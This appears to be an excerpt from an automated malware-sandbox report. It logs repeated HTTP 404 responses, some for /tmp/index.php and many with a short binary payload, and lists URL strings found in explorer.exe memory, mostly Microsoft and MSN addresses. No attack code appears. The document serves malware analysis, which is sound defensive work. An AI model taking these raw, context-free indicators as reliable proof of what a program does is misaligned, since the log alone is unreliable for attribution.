    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:29:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:30:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:31:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:31:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
    Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
    Source: explorer.exe, 00000001.00000000.1896371569.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1897161023.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1915165701.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
    Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1893438763.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000001.00000000.1897951937.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
    Source: explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000001.00000000.1897951937.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
    Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
